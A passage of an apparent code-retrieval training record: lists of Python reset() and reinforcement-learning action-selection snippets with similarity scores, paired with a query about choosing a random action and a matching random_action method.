reset(self):", "def reset(self):", "def reset(self):", "def reset(self):\n self._accumulated_time.clear()\n self._hit_count.clear()", "def reset(self):\n self._total_value = 0.0\n self._count = 0", "def reset(self):\n self.count = 0\n self.soft = False\n self.can_double = True\n self.can_split = False\n self.first_card = 0", "def reset(self):\n ...", "def reset(self):\n ...", "def reset(self):\n for counterKey in self.counters.keys():\n self.counters[counterKey]=0\n self.title=None # 025 This is a hack of a hack. Trying to find if the counter was reset recently.", "def reset() -> None:\n ...", "def _reset(self) -> None:", "def _reset(self) -> None:", "def reset(self):\n self.fuzz_complete = False\n self.mutant_index = 0\n self.value = self.original_value", "def reset(self):\n self.num_inst = 0\n self.sum_metric = 0.0", "def reset(self) -> List[int]:", "def reset(self):\n self.restart()\n self.cycles = 0", "def __reset_pat(self):\n\t\tself.pat_it = iter(self.pat_array)", "def hard_reset() -> NoReturn:", "def _reset(self):", "def reset(self):\n self.sum_metric = 0.\n self.num_inst = 0.\n self.metrics.reset_stats()", "def reset(self):\n self.visited = False\n self.calculated = False\n self.past_value = self.value\n self.value = 0", "def reset(self) -> None:", "def reset(self) -> None:", "def reset(self) -> None:", "def reset(self):\n self._regex = None\n self._includes.clear()", "def reset() -> None:\n\t_flag.clear()", "def reset(self):\n self.reset_count += 1\n self._init_data()", "def reset(self):\n self.mode = 0\n self.graphs = [[], [], []]\n self.coefficients = []\n self.sample = []", "def reset_gensym_counter(val = 0, verbose = False):\n global counter\n if isinstance(val, int):\n counter = val\n else:\n counter = 0\n if verbose:\n print \"counter = {0}\".format(counter)", "def _reset(self):\n if self.mode not in ['auto', 'min', 'max']:\n warnings.warn('Learning Rate Plateau Reducing mode %s is unknown, '\n 'fallback to auto mode.' 
% (self.mode),\n RuntimeWarning)\n self.mode = 'auto'\n if (self.mode == 'min' or\n (self.mode == 'auto' and 'acc' not in self.monitor)):\n self.monitor_op = lambda a, b: np.less(a, b - self.min_delta)\n self.best = np.Inf\n else:\n self.monitor_op = lambda a, b: np.greater(a, b + self.min_delta)\n self.best = -np.Inf\n self.cooldown_counter = 0\n self.wait = 0", "def __reset(self):\n\t\tself.__highest = -float('inf')\n\t\tself.__lowest = float('inf')\n\t\tself.__total = 0\n\t\tself.__steps = 0\n\t\tself.__cold_days = 0", "def clear(self):\n self.sum_hit_at_one = 0.0\n self.sum_perr = 0.0\n self.sum_loss = 0.0\n self.map_calculator.clear()\n self.global_ap_calculator.clear()\n self.num_examples = 0", "def reset(self):\n self.best_res = -1\n self.best_epoch = self.ignore_before", "def reset(self):\n self.dynamic_predictions = {}\n self.position = 0\n self.references = []", "def _reset(self):\n if self.mode not in ['auto', 'min', 'max']:\n logging.warning('Learning Rate Plateau Reducing mode %s is unknown, '\n 'fallback to auto mode.', self.mode)\n self.mode = 'auto'\n if (self.mode == 'min' or\n (self.mode == 'auto' and 'acc' not in self.monitor)):\n self.monitor_op = lambda a, b: np.less(a, b - self.min_delta)\n self.best = np.Inf\n else:\n self.monitor_op = lambda a, b: np.greater(a, b + self.min_delta)\n self.best = -np.Inf\n self.cooldown_counter = 0\n self.wait = 0", "def reset(self):\n \n pass", "def reset():\n global current, tries, wins, winstreak, losestreak, mood, scorepos\n global p1score, p1ws, p1ls, p1mood, p2score, p2ws, p2ls, p2mood\n global p1scorepos, p2scorepos, result2pline, result2p\n \n current = 0\n tries = 0\n wins = 0\n winstreak = 0\n losestreak = 0\n mood = \"#FFF8DC\"\n scorepos = (250, 140)\n \n p1score = 0\n p1ws = 0\n p1ls = 0\n p1mood = \"#FFF8DC\"\n p1scorepos = (132,510)\n p2score = 0\n p2ws = 0\n p2ls = 0\n p2mood = \"#FFF8DC\"\n p2scorepos = (426,510)\n result2pline = 0.1\n result2p = \"\"\n \n timer.stop()", "def reset() -> None:\n Parameter.by_name = {}", "def reset(self) -> None:\n self.counterpoint = self.counterpoint[0:1]\n self.__initialize_piano_roll()\n self.__set_defaults_to_runtime_variables()", "def reset(self):\n self._idx = 0", "def reset(self, *args, **kwargs):", "def reset(self):\n self.score = None\n self.true = None\n self.meta = None", "def reset_counter(self) -> None:\n self._fail_counter = 0", "def reset(self):\n self.last_round = False\n self.last_player = None\n self.scores = [0] * self.num_players\n self.current_player = 0\n self.turn = 0\n self.roll = None", "def reset(self):\n self.kw_func = {**self.default_func}\n self.kw_var = {}\n self.kw_lines = []\n self.status_listener = None\n self.line_count = 0\n self.case_id = 0\n if self.run_signal:\n self.run_signal.stop = False\n self._have_record_res = False", "def reset(self):\n self.j = 1", "def reset(self):\n self._proportional = 0\n self._integral = 0\n self._derivative = 0\n\n self._last_time = self._current_time()\n self._last_output = None\n self._last_input = None", "def reset_for_new_run(\n self,\n state: State\n ):\n\n super().reset_for_new_run(state)\n\n self.epsilon = self.original_epsilon\n self.greedy_action = list(self.Q.keys())[0]", "def reset(self):\n self.start_times = {}\n self.stats = defaultdict(OnlineMeter) # float defaults to 0", "def reset(self) -> None:\n ...", "def reset(self) -> None:\n ...", "def reset(self) -> None:\n ...", "def reset(self) -> None:\n ...", "def reset(self) -> None:\n ..." ]
[ "0.706285", "0.70557153", "0.69341266", "0.6901927", "0.6901927", "0.6901927", "0.68682015", "0.6837828", "0.6697244", "0.6697244", "0.6697244", "0.6695066", "0.66831166", "0.66431034", "0.66348666", "0.65636104", "0.65636104", "0.65636104", "0.64995754", "0.64995754", "0.6499308", "0.64559764", "0.64407086", "0.64265853", "0.64010334", "0.63687086", "0.6368072", "0.6361042", "0.6354115", "0.6350978", "0.631896", "0.6312897", "0.62936455", "0.62835777", "0.62835777", "0.6278311", "0.6274558", "0.6274558", "0.62664825", "0.6260231", "0.62445354", "0.62432104", "0.62422067", "0.6240466", "0.6235344", "0.6229096", "0.6229096", "0.6229096", "0.6229096", "0.6208337", "0.6201614", "0.62001926", "0.61973095", "0.61973095", "0.6194502", "0.619119", "0.6186905", "0.6186905", "0.6183116", "0.6181953", "0.61796194", "0.61733615", "0.61632806", "0.6161568", "0.6160631", "0.61413586", "0.61200726", "0.6115911", "0.6115911", "0.6115911", "0.61152494", "0.61117256", "0.6110397", "0.6108705", "0.6098651", "0.6097482", "0.6095224", "0.6095083", "0.6093475", "0.6092413", "0.6090039", "0.60832804", "0.6080569", "0.60711384", "0.6065354", "0.6062416", "0.6052866", "0.6048436", "0.6048279", "0.6041745", "0.60356736", "0.6028849", "0.60158896", "0.60150236", "0.6014362", "0.6013531", "0.6013531", "0.6013531", "0.6013531", "0.6013531" ]
0.69747984
2
Policy that selects one of the available actions at random
def random_action(self, action_list=None):
        # sample from all actions
        if action_list is None:
            return np.random.choice(self.actions)

        # sample from a subset of actions
        else:
            return np.random.choice(action_list)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getAction(self, state):\n # Pick Action\n legalActions = self.getLegalActions(state)\n action = None\n \"*** YOUR CODE HERE ***\"\n # util.raiseNotDefined()\n if random.random() < self.epsilon:\n action = random.choice(legalActions)\n else:\n action = self.getPolicy(state)\n return action", "def chooseAction(self, gameState):\n actions = gameState.getLegalActions(self.index)\n\n ''' \n You should change this in your own agent.\n '''\n\n return random.choice(actions)", "def choose_random_action(env):\n return env.action_space.sample()", "def _choose_action(self):\n return random.randint(0,self.num_bandits-1)", "def chooseAction(self, gameState):\n actions = gameState.getLegalActions(self.index)\n\n '''\n You should change this in your own agent.\n '''\n\n return random.choice(actions)", "def chooseAction(self, gameState):\n actions = gameState.getLegalActions(self.index)\n\n '''\n You should change this in your own agent.\n '''\n\n return random.choice(actions)", "def choose_action(self, state):\n\n return self.policy(state).sample()", "def RandomAgentProgram(actions):\n return lambda percept: random.choice(actions)", "def RandomAgentProgram(actions):\n return lambda percept: random.choice(actions)", "def _select_action(self, state):\n if random.random() < self.epsilon:\n action = random.randrange(self.num_actions)\n return torch.tensor([[action]], device=device, dtype=torch.long)\n else:\n with torch.no_grad():\n return self.policy_net(state).max(1)[1].view(1, 1)", "def getAction(self, state):\n # Pick Action\n legalActions = self.getLegalActions(state)\n action = None\n\n \"\"\"Description:\n Use util.flipCoin, if return true then randomly choice from legalAction\n if flase, then sue getPolicy to get best policy action\n \"\"\"\n \"\"\" YOUR CODE HERE \"\"\"\n if len(legalActions) == 0:\n return action # None\n \n if util.flipCoin(self.epsilon):\n ''' exploration function (not work well)''' \n# posPol = util.Counter()\n# for a in legalActions:\n# if self.getQValue(state,a) >= 0:\n# posPol[a] = -1*self.getQValue(state, a) + (1000/(self.vitCount[(state,a)]+0.0001))\n# #print \"posPol[\", a, \"]= \",posPol[a]\n# #posPol[a] = (self.getQValue(state, a) * self.epsilon** self.vitCount[(state,a)]) + ( self.epsilon/(self.vitCount[(state,a)]+0.1) )\n# if len(posPol) == 0:\n# action = random.choice(legalActions)\n# else:\n# action = posPol.argMax() # random.choice(posPol.keys())\n ''' Random exploration '''\n action = random.choice(legalActions)\n else:\n action = self.getPolicy(state)\n \n \"\"\" END CODE \"\"\"\n\n return action", "def select_action(self, **kwargs):\n return np.random.randint(0, self.num_actions)", "def pick_action(self, available_actions, epsilon=.05):\n if np.random.uniform(0, 1) < epsilon:\n action = available_actions[np.random.randint(\n 0, len(available_actions))]\n else:\n q_values_of_state = self.q_table[self.environment.current_location]\n maxValue = max(q_values_of_state.values())\n action = np.random.choice(\n [k for k, v in q_values_of_state.items() if v == maxValue]\n )\n\n return action", "def act(observation):\n current_policy = sess.run(policy, {observation_: [observation]})\n action = np.random.choice(action_size, p=current_policy[0])\n return action", "def choose_action(self):\n\n def is_random_exploration():\n\n # 5. 
Return whether do random choice\n # hint: generate a random number, and compare\n # it with epsilon\n if random.random() < self.epsilon:\n return True\n else:\n return False\n\n final_action = ''\n if self.learning:\n if is_random_exploration():\n # 6. Return random choose aciton\n final_action = self.valid_actions[random.randint(0, 3)]\n else:\n # 7. Return action with highest q value\n final_action = max(\n self.Qtable[self.state].items(),\n key=operator.itemgetter(1))[0]\n elif self.testing:\n # 7. choose action with highest q value\n final_action = max(\n self.Qtable[self.state].items(),\n key=operator.itemgetter(1))[0]\n else:\n # 6. Return random choose aciton\n final_action = self.valid_actions[random.randint(0, 3)]\n\n return final_action", "def _select_action(self):\n if self.eval_mode:\n self._log_values()\n epsilon = self.epsilon_eval\n else:\n epsilon = self.epsilon_fn(\n self.epsilon_decay_period,\n self.training_steps,\n self.min_replay_history,\n self.epsilon_train)\n if random.random() <= epsilon:\n # Choose a random action with probability epsilon.\n return random.randint(0, self.num_actions - 1)\n else:\n # Choose the action with highest Q-value at the current state according\n # to the current head.\n return self._compute_q_argmax()", "def choose_action(self, board, possible_actions):\r\n return np.random.choice(possible_actions)", "def choose_random_action(self):\r\n return Action.HIT if random.random() <= 0.5 else Action.STICK", "def randomAction():\n return np.random.randint(0, POSSIBLE_ACTIONS)", "def choose_random_action(all_actions: int) -> int:\n return np.random.randint(all_actions)", "def choose_action(self, state):\n prob = [] # Probability distribution\n for i in range(len(ACTIONS)):\n prob.append(self.epsilon/4)\n Q_func = self.policy.predict(process_state(state))\n Q_vals = Q_func[0]\n max_index = []\n Qmax = np.amax(Q_vals)\n for i in range(len(prob)):\n if Q_vals[i] == Qmax:\n # max_index.append(i)\n prob[i] = 1 - self.epsilon + self.epsilon/4\n break\n # ind = np.random.choice(max_index)\n # prob[ind] = 1 - self.epsilon + self.epsilon/4\n action = np.random.choice(ACTIONS, p = prob)\n return action", "def __call__(self, num_actions):\n return np.random.choice(num_actions)", "def get_action(self, state):\n time.sleep(2.0)\n return random.choice(state.get_legal_actions(self.index))", "def _select_action(self):\n if self.eval_mode:\n epsilon = self.epsilon_eval\n else:\n epsilon = self.epsilon_fn(\n self.epsilon_decay_period,\n self.training_steps,\n self.min_replay_history,\n self.epsilon_train)\n if random.random() <= epsilon:\n # Choose a random action with probability epsilon.\n return random.randint(0, self.num_actions - 1)\n else:\n # Choose the action with highest Q-value at the current state.\n if self._interact == 'stochastic':\n selected_action = self._stochastic_action\n elif self._interact == 'greedy':\n selected_action = self._q_argmax\n else:\n raise ValueError('Undefined interaction')\n return self._sess.run(selected_action,\n {self.state_ph: self.state})", "def select_action(self, state):\r\n policy_s = self.epsilon_greedy_probs(self.nA, self.Q[state], self.count, self.epsilon)\r\n return np.random.choice(np.arange(self.nA), p=policy_s)", "def chooseAction(self,state):\r\n #generate float btwn 0-1\r\n choice = random.random()\r\n \r\n #choose according to that number\r\n if choice > self.epsilon:\r\n return(self.maxQ(state)[1])\r\n else:\r\n #choose randomly\r\n return(self.actions[random.randrange(0,len(self.actions))])", "def 
chooseAction(self,state):\r\n #generate float btwn 0-1\r\n choice = random.random()\r\n \r\n #choose according to that number\r\n if choice > self.epsilon:\r\n return(self.maxQ(state)[1])\r\n else:\r\n #choose randomly\r\n return(self.actions[random.randrange(0,len(self.actions))])", "def chooseAction(self,state):\r\n #generate float btwn 0-1\r\n choice = random.random()\r\n feat = self.feat_funct(state)\r\n #choose according to that number\r\n if choice > self.epsilon:\r\n return(self.maxQ(feat)[1])\r\n else:\r\n #choose randomly\r\n return(self.actions[random.randrange(0,len(self.actions))])", "def get_action(self, state):\n return random.choice(state.get_legal_actions(self.index))", "def selectAction(self, state, require_q=False):\n e = self.exploration.value(self.steps_done)\n self.steps_done += 1\n q_values = self.forwardPolicyNet(state)\n if random.random() > e:\n action = q_values.max(1)[1].view(1, 1)\n else:\n if hasattr(self.env, 'nA'):\n action_space = self.env.nA\n else:\n action_space = self.env.action_space.n\n action = torch.tensor([[random.randrange(action_space)]], device=self.device, dtype=torch.long)\n q_value = q_values.gather(1, action).item()\n if require_q:\n return action, q_value\n return action", "def policy(self):\r\n actions = self.domain.get_actions()\r\n # Random policy (please uncomment the following line to test it, and comment the \"always accelerate\" policy)\r\n #index = random.randint(0, 1)\r\n # \"Always accelerate\" policy\r\n index = 1\r\n return actions[index]", "def sample(self, action):\n selector = random.random()\n return 1 if selector <= self.pay_offs[action] else 0", "def select_action(policy_net, state, eps, n_actions, device, steps_done):\n sample = random.random()\n if sample > eps:\n with torch.no_grad():\n # t.max(1) will return largest column value of each row\n # second column on max result is index of where max element was\n # found, so we pick action with the larger expected reward\n return torch.tensor([[policy_net.forward(state.float()).argmax()]], device=device,\n dtype=torch.long)\n else:\n return torch.tensor([[random.randrange(n_actions)]], device=device, dtype=torch.long)", "def select_action(state, policy, model, num_actions,\n EPS_START, EPS_END, EPS_DECAY, steps_done, alpha, beta):\n # sample = random.random()\n # eps_threshold = EPS_END + (EPS_START - EPS_END) * \\\n # math.exp(-1. 
* steps_done / EPS_DECAY)\n # .data.max(1)[1].view(1, 1)\n # if sample <= eps_threshold:\n # return LongTensor([[random.randrange(num_actions)]])\n\n\n \n Q = model(Variable(state, volatile=True).type(FloatTensor))\n pi0 = policy(Variable(state, volatile=True).type(FloatTensor))\n # print(pi0.data.numpy())\n V = torch.log((torch.pow(pi0, alpha) * torch.exp(beta * Q)).sum(1) ) / beta\n \n #### FOUND ERROR: ( Q ) returns a tensor of nan at some point\n if np.isnan( Q.sum(1).data[0]) :\n print(\"Q = \", Q)\n print(\"state = \", state)\n\n pi_i = torch.pow(pi0, alpha) * torch.exp(beta * (Q - V))\n m = Categorical(pi_i)\n action = m.sample().data.view(1, 1)\n return action\n # numpy.random.choice(numpy.arange(0, num_actions), p=probabilities)", "def select_action(self):\n estimated_q_a = self._action_value_estimator.get_estimated_q_a()\n\n if np.random.rand() < self._epsilon:\n chosen_action = random.choice(list(estimated_q_a.keys()))\n else:\n chosen_action = max(estimated_q_a, key=estimated_q_a.get)\n\n return chosen_action", "def policy_action(self, s):\n return np.random.choice(np.arange(self.act_dim), 1, p=self.actor.predict(s).ravel())[0]", "def chooseAction(self, gameState):\n\n ####print \"chooseAction Called\"\n\n #self.lastEatenFood = None\n\n\n actions = gameState.getLegalActions(self.index)\n\n ##print \"\\nNEW ACTION\\n--------\"\n\n # You can profile your evaluation time by uncommenting these lines\n # start = time.time()\n values = [self.evaluate(gameState, a) for a in actions]\n # ###print 'eval time for agent %d: %.4f' % (self.index, time.time() - start)\n\n maxValue = max(values)\n bestActions = [a for a, v in zip(actions, values) if v == maxValue]\n\n \n\n return random.choice(bestActions)", "def select_action(self, state, evaluate=False):\n random_action = torch.tensor(random.randint(0,self.env.nA-1))\n return random_action", "def sample_action(self, state):\n # YOUR CODE HERE\n \n action = np.random.choice(1)\n \n \n return action", "def select_action(self, state):\n\t\treturn sample(range(0, self.action_space), 1)[0]", "def pick_random_action(self):\n\n actions = [self.delete_first_connection, self.delete_last_connection, self.add_connection_beginning, self.add_connection_ending]\n action = random.choice(actions)\n return action", "def get_random_action():\n # Define an array containing the available actions for the UAV\n # in the final work, takeoff and land must be added\n action_list = ['left', 'right', 'forward', 'backward', 'stop', 'descend']\n # Choose a random action within the array\n #action_index = STDrandom.randint(0, len(action_list) - 1)\n # forward,backward,left,right, stop and land\n probability_descend = 0.25\n probability = (1 - probability_descend)/ (len(action_list) -1)\n action_probability = [probability, probability, probability, probability, probability, probability_descend]\n action = np.random.choice(action_list, 1, p=action_probability)[0]\n #action_index = STDrandom.randint(0, 10)\n #action = action_list[action_index]\n\n return action", "def choose_action(self):\r\n pass", "def decision():\n return random.choice(['GoToNormal','GoToSleep'])", "def sample_action(policy, state):\n nS, nA = policy.shape\n all_actions = np.arange(nA)\n return np.random.choice(all_actions, p=policy[state])", "def select_action(self, state):\n\n if state in self.Q:\n prob = self.get_probs(self.Q[state])\n else:\n prob = np.ones(self.nA) / self.nA\n return np.random.choice(np.arange(self.nA), p = prob)", "def start_step_policy(self, observation):\n log.info(\"Random 
action\")\n _ = observation\n action = self.env.action_space.sample()\n return action", "def chooseAction(self, gameState):\n\n actions = gameState.getLegalActions(self.index)\n\n action_choose = uct_for_pacman(gameState, self)\n if action_choose not in actions:\n return random.choice(actions)\n print(\"此步来自UCT\")\n self.action_last = action_choose\n return action_choose", "def __sample_policy_action(probs):\n # Subtract a tiny value from probabilities in order to avoid\n # \"ValueError: sum(pvals[:-1]) > 1.0\" in numpy.multinomial\n probs = probs - np.finfo(np.float32).epsneg\n\n action_indexes = [int(np.nonzero(np.random.multinomial(1, p))[0]) for p in probs]\n############################################################################################\n # action_indexes = [np.argmax(p) for p in probs] #select the action with the highest probability instead of randomly sampling\n # print(action_indexes)\n # print('++++++++++++++++++++++++')\n############################################################################################\n return action_indexes", "def chooseAction(self, gameState):\n\n actions = gameState.getLegalActions(self.index)\n obs = gameState.getAgentDistances()\n for o in self.opponents:\n self.observe(o, obs[o], gameState)\n self.displayDistributionsOverPositions(self.distributions)\n\n # You can profile your evaluation time by uncommenting these lines\n start = time.time()\n values = [self.evaluate(gameState, a) for a in actions]\n print 'eval time for agent %d: %.4f' % (self.index, time.time() - start)\n\n maxValue = max(values)\n bestActions = [a for a, v in zip(actions, values) if v == maxValue]\n\n #self.elapseTime(gameState)\n\n return random.choice(bestActions)", "def random_choice(self, actions=None, random_state=None):\n random_state = check_random_state(random_state)\n\n if actions is not None:\n n = len(actions)\n else:\n n = self.num_actions\n\n if n == 1:\n idx = 0\n else:\n idx = rng_integers(random_state, n)\n\n if actions is not None:\n return actions[idx]\n else:\n return idx", "def sample_action(q_pi, policies, num_controls, action_selection=\"deterministic\", alpha = 16.0):\n\n num_factors = len(num_controls)\n\n action_marginals = utils.obj_array_zeros(num_controls)\n \n # weight each action according to its integrated posterior probability over policies and timesteps\n for pol_idx, policy in enumerate(policies):\n for t in range(policy.shape[0]):\n for factor_i, action_i in enumerate(policy[t, :]):\n action_marginals[factor_i][action_i] += q_pi[pol_idx]\n \n selected_policy = np.zeros(num_factors)\n for factor_i in range(num_factors):\n\n # Either you do this:\n if action_selection == 'deterministic':\n selected_policy[factor_i] = np.argmax(action_marginals[factor_i])\n elif action_selection == 'stochastic':\n p_actions = softmax(action_marginals[factor_i] * alpha)\n selected_policy[factor_i] = utils.sample(p_actions)\n\n return selected_policy", "def choose_action(self, state):\n if random.random() < self.epsilon:\n self.epsilon -= self.epsilon_annealing_rate\n return random.choice(self.valid_actions)\n \n #initialize search variables\n opt_action = self.valid_actions[0]\n opt_value = 0\n\n #performs a search across all valid actions for highest q-value.\n for action in self.valid_actions:\n cur_value = self.q_value(state, action)\n if cur_value > opt_value:\n opt_action = action\n opt_value = cur_value\n elif cur_value == opt_value:\n opt_action = random.choice([opt_action, action])\n return opt_action", "def random_action(self, observation):\n 
return self.env.action_space.sample()", "def best_action(self, state):\n return random.choice(self.possible_actions)", "def choose_action(self, observation):\n observation = observation[np.newaxis, :]\n \n prob_weights = self.sess.run(\n self.all_act_prob,\n feed_dict={self.tf_obs: observation})\n\n action = npr.choice(range(prob_weights.shape[1]), p=prob_weights.ravel())\n\n return action", "def _take_action(self, action):\n # Get transition probabilities for all potential next state values\n trans_probs = self.transition_probabilities[self.cur_state, action]\n\n # Generate an array of next state options to choose from\n next_state_options = np.linspace(0, self.n_states-1, self.n_states,\n dtype=int)\n\n # Sample from new state options based on the transition probabilities\n new_state = np.random.choice(next_state_options, p=trans_probs)\n\n return new_state", "def select_action(self, state: str) -> Action:\n rnd_num = self._random.random()\n p = 1.0 - self.epsilon\n if rnd_num > p:\n action = self._random.random_choice() \n else:\n action = max(self.Qs[state], key=lambda x: self.Qs[state][x])\n if self.epsilon_decay == True:\n self.turns += 1\n if self.turns < self.end_epsilon_decay:\n self.epsilon -= self.decay_value \n return action", "def chooseAction(self, gameState):\n actions = gameState.getLegalActions(self.index)\n\n # You can profile your evaluation time by uncommenting these lines\n # start = time.time()\n values = [self.evaluate(gameState, a) for a in actions]\n # print 'eval time for agent %d: %.4f' % (self.index, time.time() - start)\n\n maxValue = max(values)\n bestActions = [a for a, v in zip(actions, values) if v == maxValue]\n\n return random.choice(bestActions)", "def sample_action(self, state, timestep, explore_prob):\r\n\r\n if np.random.random() < explore_prob:\r\n return np.random.uniform(*self.bounds, size=(self.action_size,))\r\n return self.action_select_eval(self.model, state, timestep)[0].detach()", "def get_random_action(self) -> ActionType:\n return self.action_space.sample()", "def chooseAction(self, gameState):\n\n return \"Stop\"\n\n actions = gameState.getLegalActions(self.index)\n\n return random.choice(actions)", "def __call__(self, state):\n if random.random() > self._epsilon:\n return self._max_policy(state)\n return random.choice(np.arange(self._action_size))", "def select_action(self, state):\n if state in self.Q:\n action = np.random.choice(np.arange(self.nA), p=self.get_probs(self.Q[state], self.epsilon, self.nA))\n else :\n action = np.random.choice(self.nA)\n\n return action", "def act(self, state):\r\n self.state_info, actions= self.env.generatePossibleAction(state)\r\n # import pdb; pdb.set_trace()\r\n # print(actions)\r\n if self.eps > 0. 
and np.random.rand() < self.eps:\r\n # select the action randomly\r\n return random.choice(actions)\r\n # import pdb; pdb.set_trace()\r\n qvals = {action: self.Q_value[self.state_info, action] for action in actions}\r\n max_q = max(qvals.values())\r\n\r\n # in case of multiple actions having the same Q values\r\n actions_with_max_q = [a for a,q in qvals.items() if q == max_q]\r\n return random.choice(actions_with_max_q)", "def select_action(self, state):\n # print(\"agent.select_action() - state: {}\".format(state))\n\n self.step_counter += 1\n # self.epsilon = max(0.1, 1.0-self.step_counter/self.epsilon_decay_steps)\n epsilon_min = .01\n epsilon_max = .8\n epsilon_step = epsilon_max - (epsilon_max - epsilon_min) * self.step_counter / self.epsilon_decay_steps\n self.epsilon = max(epsilon_min, epsilon_step)\n # self.epsilon = max(0.1, 1.0/self.step_counter)\n\n rand = random.uniform(0, 1)\n if rand < self.epsilon:\n # choose random action\n return np.random.choice(self.nA)\n else:\n # choose greedy action\n return np.argmax(self.Q[state])", "def select_action(policy, state):\n #torch.manual_seed(RAND_SEED) # Seed here is causing kernel to crash\n state = torch.from_numpy(state).long().unsqueeze(0)\n state = torch.zeros(3,9).scatter_(0,state,1).view(1,27)\n #print(state) # for 2b\n pr = policy(Variable(state))\n #print(pr) # for 2c\n m = torch.distributions.Categorical(pr)\n action = m.sample()\n log_prob = torch.sum(m.log_prob(action))\n return action.data[0], log_prob", "def chooseAction(self, gameState):\n\n actions = gameState.getLegalActions(self.index)\n\n values = [self.evaluate(gameState, a) for a in actions]\n\n maxValue = max(values)\n bestActions = [a for a, v in zip(actions, values) if v == maxValue]\n\n return random.choice(bestActions)", "def select_action(self, state):\n \n ##create lists and string to save relative action information\n actions = []\n action = ''\n all_actions = []\n \n ##get the action with the maximum value\n temp = {}\n for (s, a), value in self.Q.iteritems():\n if s == state:\n temp[(s, a)] = value\n all_actions.append(a) \n max_value = max(temp.values())\n for (s, a) , value in temp.iteritems():\n if value == max_value:\n actions.append(a)\n\n ##if we have more than one action with max_values, random return one\n if len(actions) > 1:\n index = random.randint(0,len(actions) - 1)\n action = str(actions[index])\n else:\n for item in actions:\n action = item\n \n ##when the random number less than epsilon, then return one action randomly \n if random.random() < self.epsilon:\n index = random.randint(0, len(all_actions) - 1)\n action = str(all_actions[index])\n \n ##if the random number not less than epsilon, then return the action with max value\n return action", "def select_action(self, state):\n \n ##create lists and string to save relative action information\n actions = []\n action = ''\n all_actions = []\n \n ##get the action with the maximum value\n temp = {}\n for (s, a), value in self.Q.iteritems():\n if s == state:\n temp[(s, a)] = value\n all_actions.append(a)\n \n max_value = max(temp.values())\n for (s, a) , value in temp.iteritems():\n if value == max_value:\n actions.append(a)\n\n ##if we have more than one action with max_values, random return one\n if len(actions) > 1:\n index = random.randint(0,len(actions) - 1)\n action = str(actions[index])\n else:\n for item in actions:\n action = item\n \n ##when the random number less than epsilon, then return one action randomly \n if random.random() < self.epsilon:\n index = random.randint(0, 
len(all_actions) - 1)\n action = str(all_actions[index])\n \n ##if the random number not less than epsilon, then return the action with max value\n return action", "def choose_action(self, obs, **kwargs):\n pass", "def chooseAction(self, gameState):\n actions = gameState.getLegalActions(self.index)\n\n # You can profile your evaluation time by uncommenting these lines\n # start = time.time()\n values = [self.evaluate(gameState, a) for a in actions]\n # print 'eval time for agent %d: %.4f' % (self.index, time.time() - start)\n\n maxValue = max(values)\n bestActions = [a for a, v in zip(actions, values) if v == maxValue]\n\n foodLeft = len(self.getFood(gameState).asList())\n\n return random.choice(bestActions)", "def toggle_random_action(self):\n if self.performing_random_actions:\n if self.action_count < self.random_action_count and self.previous_action is not None:\n action = self.previous_action\n else:\n # switch to non-random\n action = Action(has_control=False)\n self.action_count = 0\n self.performing_random_actions = False\n else:\n if self.action_count < self.non_random_action_count and self.previous_action is not None:\n action = self.previous_action\n else:\n # switch to random\n steering = np.random.uniform(-0.5, 0.5, 1)[0] # Going too large here gets us stuck\n log.debug('random steering %f', steering)\n throttle = 0.65 # TODO: Make throttle random to get better variation here\n action = Action(steering, throttle)\n self.action_count = 0\n self.performing_random_actions = True\n return action", "def __ExecuteActionForRandomAgentWithNoisyTransitionModel__(self, idx_request_action, noise_level):\n n = len(self.AGENT_ALLOWED_ACTIONS)\n pp = noise_level/(n-1) * np.ones((n,1))\n pp[idx_request_action] = 1.0 - noise_level\n idx_actual = np.random.choice(n, 1, p=pp.flatten()) # sample from the distrbution of actions\n actual_action = self.AGENT_ALLOWED_ACTIONS[int(idx_actual)]\n self.agent_host.sendCommand(actual_action)\n self.solution_report.addAction()\n return actual_action", "def choose_action(self, observation):\r\n observation = T.unsqueeze(T.FloatTensor(observation), 0)\r\n # Epsilon-greedy policy\r\n if np.random.uniform() < self.epsilon: \r\n # Get all of the Q values for the current state (forward prop)\r\n actions_value = self.Q_eval.forward(observation)\r\n\r\n # Take the optimal action \r\n action = T.max(actions_value, 1)[1].data.numpy()\r\n action = action[0] if self.action_space == 0 else action.reshape(self.action_space) # return the argmax index\r\n else: \r\n # Choose a random action in the action space list\r\n action = np.random.randint(0, self.num_actions)\r\n action = action if self.action_space == 0 else action.reshape(self.action_space)\r\n\r\n return action", "def sampleAction(self, game_info):\n pState = torch.Tensor(game_info['p_state'])\n legalActions = torch.Tensor(game_info['legal_actions'])\n action = self.policy.sampleAction(pState, legalActions)\n return action", "def random_play(state, player):\n import random\n actions = YoteRules.get_player_actions(state, player, reward_move=state.rewarding_move)\n choice = random.choice(actions)\n return choice", "def select_action(policy, state):\n state = torch.from_numpy(state).long().unsqueeze(0)\n state = torch.zeros(3,9).scatter_(0,state,1).view(1,27)\n pr = policy(Variable(state))\n m = torch.distributions.Categorical(pr)\n action = m.sample()\n log_prob = torch.sum(m.log_prob(action))\n return action.data[0], log_prob", "def randomize_next_action(self, actions, player):\n if not actions: return\n 
action_count = len(actions) - 1\n action_index = randint(0, action_count)\n actions[action_index](self, player)", "def select_action(images, n_actions, device, eps_threshold=-1):\n actions = []\n\n for i in images:\n if eps_threshold == -1:\n actions.append(torch.tensor([[random.randrange(n_actions)]], device=device, dtype=torch.long))\n else:\n sample = random.random()\n if sample > eps_threshold:\n with torch.no_grad():\n # t.min(1) will return smallest column value of each row.\n # second column on min result is index of where min element was\n # found, so we pick action with the lower expected reward.\n actions.append(policy_net(i.unsqueeze(0)).min(1)[1].view(1, 1))\n else:\n actions.append(torch.tensor([[random.randrange(n_actions)]], device=device, dtype=torch.long))\n\n return torch.tensor(actions, device=device)", "def choose_action(self, state):\n if random.random() < self.e_greedy_prob:\n # randomly select action from state\n action = np.random.choice(len(self.q_val_table[state]))\n else:\n # greedily select action from state\n action = np.argmax(self.q_val_table[state])\n return action", "def sample_action(self, init=False): \n # selecting a_t at random\n current_state = self.state\n if (init):\n current_state = 0\n possible_actions = np.array(self.A[current_state])\n possible_actions = possible_actions[possible_actions != -1]\n if (len(possible_actions) == 0):\n self.action_choice = -2\n return\n\n choice = np.random.choice(possible_actions)\n self.action_choice = choice\n action = self.get_action_from_col(choice)\n\n robot_action = RobotMoveDBToBlock()\n robot_action.robot_db = convert_color_to_str(\n action[0]) # \"red\", \"green\", \"blue\"\n robot_action.block_id = action[1] # 1, 2, 3\n 